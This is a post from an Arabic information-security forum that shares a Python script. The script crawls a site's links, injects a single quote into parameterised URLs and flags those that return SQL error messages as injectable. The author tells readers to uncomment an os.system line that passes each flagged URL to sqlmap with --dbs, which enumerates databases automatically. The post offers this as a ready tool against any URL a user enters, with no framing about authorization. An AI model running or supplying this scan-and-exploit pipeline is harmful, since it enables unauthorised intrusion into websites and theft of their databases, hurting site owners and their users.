طريقة فحص المواقع من ثغرة sql وجلب الروابط

احصائياتى
الردود
0
المشاهدات
359
THE SHIELD

THE SHIELD

IT Security Engineer
طاقم الإدارة
معلومات THE SHIELD
إنضم
29 مايو 2018
المشاركات
593
مستوى التفاعل
421
النقاط
63
الإقامة
Sa3eKa City
نظام التشغيل
mac
فحص المواقع من ثغرة sql وجلب الروابط
السلام عليكم ورحمة الله وبركاته

البرمجة python 3.5
المكتبات
BeautifulSoup
requests

طبعا الاداة هذي وظيفتها جلب روابط الموقع وفحصها
وبالامكان تطويرها اكثر بكثير من ذلك
بعد تشغيل الاداة يطلب منك رابط
تضع الرابط فقط مثلا
http://xxx.com/
يقوم بسحب السورس الخاص بالموقع
واخراج كامل الروابط من داخل السورس
والبحث عن الروابط اللي فيها متغيرات
?id=2
مثلا اي متغير يجلبه
ويقوم بفحصها من ثغرة سكيول انجكشن
لو حصل ثغرة اخرج لك
الروابط اي رابط يخرج لك معناته مصاب

هذا الكود
كود:
import urllib.request
from bs4 import BeautifulSoup
import os
class scan:
    def get_full_url(self,html):
        listurll = list()
        soup = BeautifulSoup(html,'html.parser')
        full = list()
        for i in soup.findAll('a'):
            c = i.get('href')
            if ("=" in c):
                listurll.append(c)
            else:
                full.append(c)
        return listurll


    def get_html(self,url):
        fin = list()
        Open = urllib.request.urlopen(url)
        Reader = Open.read()
        f = self.get_full_url(Reader)
        return f

    def connect(self,url):
        fun = self.get_html(url)
        for io in fun:
            try:
                if "http" not in io:
                    io = url + io
                else:
                    io = io
                resp = urllib.request.urlopen(io + "%27")
                ree = resp.read()
                l = ("MySQL", "mysql_fetch_array", "warning", "sql", "You have an error in your SQL", "syntax","mssql","warning")
                for check in l:
                    if check in str(ree):
                        print("\r\n","Check The Url\r\n", "   ", io)
                        #os.system("python sqlmap.py -u {} --dbs".format(io))
                        break
                    else:
                        print("=",end="")
            except urllib.error.URLError as e:
                print(e)
                continue
            except urllib.error.HTTPError as e:
                print(e)
                continue



url = str(input("Enter Url >>> "))
cl = scan()
a = cl.connect(url)
طبعا لو اردت ان يتم استغلال الروابط اليا عن طريق اداة سكيول ماب
هنا
كود:
#os.system("python sqlmap.py -u {} --dbs".format(io))
فقط قك بازالة المربع من الكود

ويجب ان تكون الاداة بجانب اداة سكيول ماب بالويندوز
اصحب اللينكس فقط يستبدلون الرابط كامل بالرابط التالي
كود:
os.system("sqlmap -u {} --dbs".format(io))
 

من نحن ؟؟

شبكة الصاعقة : هو احد منتديات امن المعلومات يهدف الى الوصول لاقصى الخبرات في الحماية

أعلى